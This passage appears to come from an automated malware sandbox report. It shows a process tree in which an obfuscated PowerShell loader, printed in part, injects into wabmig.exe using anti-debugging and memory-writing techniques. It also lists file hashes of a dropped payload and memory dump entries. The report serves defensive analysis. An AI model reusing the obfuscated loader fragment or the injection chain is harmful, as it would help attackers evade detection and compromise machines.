omMSolvaHumol dy,kgaldnBarkiD,adnIrreg,otae scerVaclsSemi.Gelis Te uTirsb pysSoott,ailrBraniTi.sn Papg Ma (Jara$SparsBratp resiEphyr,eigt Ten,Vort$ H lSPulmk UnaiProcbUbess AfthOli aDis nOv rdLegil PraeUndvrBsteePerenPrers .ip)Synd ');Fanklubbernes $Arcos;"
            4⤵
            • Network Service Discovery
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3604
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Potboiled.Asy && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2068
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1460

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u4klab5j.spa.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Potboiled.Asy
      Filesize

      463KB

      MD5

      e9bb4d5b8741d25cee213e93e940dcdb

      SHA1

      88ed84dcb96f4213925e3f82a1f6266b87d577d6

      SHA256

      f27849467e5652ec2c195e913dd90e717f505b87100d2dd68a145f68e1c42fc9

      SHA512

      31adfb96a8171b8cdf201da024eb380ddcf2d310f2e5d8f41588a4e73a66401c91986f4d8a3c39fe6b460f0f889337cfcbc7b54b15b609180fdcde7925602acb

      Download Submit

    • memory/1460-68-0x00000000242F0000-0x0000000024340000-memory.dmp

      Filesize

      320KB

      Download

    • memory/1460-70-0x00000000243C0000-0x00000000243CA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/1460-69-0x00000000243E0000-0x0000000024472000-memory.dmp

      Filesize

      584KB

      Download

    • memory/1460-63-0x0000000000800000-0x0000000001A54000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/1460-64-0x0000000000800000-0x0000000000840000-memory.dmp

      Filesize

      256KB

      Download

    • memory/1460-62-0x0000000000800000-0x0000000001A54000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/1460-48-0x0000000001A60000-0x0000000005EA9000-memory.dmp

      Filesize

      68.3MB

      Download

    • memory/3604-39-0x00000000067A0000-0x00000000067EC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3604-43-0x0000000007930000-0x0000000007952000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3604-25-0x0000000006040000-0x00000000060A6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3604-35-0x00000000060F0000-0x0000000006444000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3604-21-0x0000000002DE0000-0x0000000002E16000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3604-22-0x00000000059A0000-0x0000000005FC8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3604-38-0x0000000006710000-0x000000000672E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3604-46-0x0000000009150000-0x000000000D599000-memory.dmp

      Filesize

      68.3MB

      Download

    • memory/3604-40-0x0000000007F70000-0x00000000085EA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/3604-41-0x0000000006C90000-0x0000000006CAA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3604-42-0x0000000007990000-0x0000000007A26000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3604-24-0x00000000058D0000-0x0000000005936000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3604-44-0x0000000008BA0000-0x0000000009144000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3604-23-0x0000000005830000-0x0000000005852000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4524-4-0x00007FF80A7A3000-0x00007FF80A7A5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4524-47-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4524-37-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4524-36-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4524-20-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4524-19-0x00007FF80A7A3000-0x00007FF80A7A5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4524-67-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4524-16-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4524-15-0x00007FF80A7A0000-0x00007FF80B261000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4524-14-0x000001C15C370000-0x000001C15C392000-memory.dmp

      Filesize

      136KB

      Download